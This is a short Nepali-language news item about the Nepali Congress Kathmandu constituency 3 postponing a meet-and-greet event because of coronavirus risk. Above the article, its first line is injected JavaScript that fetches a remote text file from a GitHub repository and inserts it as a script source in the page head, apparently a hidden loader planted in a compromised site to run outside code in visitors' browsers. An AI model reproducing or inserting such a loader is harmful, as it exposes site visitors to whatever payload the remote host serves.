;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
कात्तिक ०१,
काठमाडौं । नेपाली कांग्रेस कामठामडौं क्षेत्र नं ३ ले शनिबार राखेको भेट्घाट कार्यक्रम स्थगित गरेको छ ।
कोरोना भाइसर संक्रमणको जोखिनलाई ध्यानमा राख्दै भेटघाट कार्यक्रम स्थगित गरेको गोकर्नेश्वर नगरपालिकाकी उप-प्रमुुख समेत रहेकी नेतृ शान्ती नेपालले जानकारी दिइन् ।
उनका अनुसार जोरपार्टी स्थित पिस ब्याङकुइट्मा क्षेत्र नं ३ ले भेटघाट कार्यक्रग राखेको थियो ।
फेसबुक प्रतिक्रियाहरु